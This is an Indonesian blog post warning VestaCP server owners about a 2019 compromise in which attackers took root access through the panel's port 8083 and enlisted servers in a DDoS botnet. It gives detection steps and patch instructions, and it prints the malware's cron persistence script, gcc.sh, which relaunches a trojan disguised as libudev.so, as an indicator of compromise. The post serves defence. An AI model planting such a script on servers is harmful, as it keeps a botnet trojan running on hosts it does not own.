Segera cek dan lindungi instalasi VestaCP anda!

By | January 20, 2019
0 Comment

Gunakan VestaCP? Karenanya besar kemungkinan server sahabat pada resiko tinggi dibobol hacker, apalagi kalau settingnya dibiarkan default. Dapat disebut saya agak telat beberapa hari menuliskan ini karena sedang menjalankan troubleshooting droplet DigitalOcean yang dimatikan karena terpasang panel VestaCP.

Secara garis besar report dan diskusi celah keamanannya dapat dibaca di forum resminya disini: https://forum.vestacp.com/viewtopic.php?f=10t=16556

Yang intinya, banyak VPS yang dilaporkan telah dibobol akses rootnya lewat VestaCP dan dijadikan botnet bagi menjalankan DDoS. Dan ini seluruh terjadi secara otomatis karena alat yang diaplikasikan mengincar port default panel admin Vesta (8083).

Bagaimana mengeceknya kalau server kita telah jebol?

Cek apakah ada file berikut pada cron:

/etc/cron.hourly/gcc.sh

Isinya seperti ini:

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6

Dan dapat scan dengan antivirus ClamAV:

clamscan -r -i /usr

Hasilnya kalau positif terinfeksi:

/usr/bin/tcfndpnals: Unix.Trojan.DDoS_XOR-1 FOUND
/usr/lib/libudev.so: Unix.Trojan.DDoS_XOR-1 FOUND

Solusi sementaranya ialah dengan membatasi akses port 8083 dengan password atau mengubah portnya.

Bagi solusi permanen, tim developer Vesta baru saja merilis patchnya, silahkan update instalasinya di server sahabat: https://forum.vestacp.com/viewtopic.php?f=10t=16556start=260#p68893

  1. Dapat update lewat panel adminnya seperti lazim.

  2. Atau update lewat program operasi:

    • CentOS 
      yum update

    • Debian/Ubuntu 
      apt-get update && apt-get upgrade

  3. Alternatifnya gunakan Git: 
    cd $(mktemp -d)
    git clone git://github.com/serghey-rodin/vesta.git
    /bin/cp -rf vesta/* /usr/local/vesta/

Segera lakukan updatenya karena ini berpengaruh besar di keamanan server sahabat. Dan kalau sahabat gunakan DigitalOcean mestinya down dari kemarin karena dishutdown oleh tim keamanan mereka, ini aksesnya mesti lewat console mereka bagi memperbaikinya.


Sumber https://servernesia.com